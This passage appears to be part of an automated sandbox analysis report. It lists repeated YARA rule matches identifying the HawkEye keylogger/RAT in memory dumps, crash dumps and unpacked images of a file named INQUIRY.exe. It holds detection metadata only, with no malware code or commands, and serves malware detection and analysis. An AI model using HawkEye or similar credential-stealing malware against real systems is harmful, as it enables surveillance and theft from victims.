                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
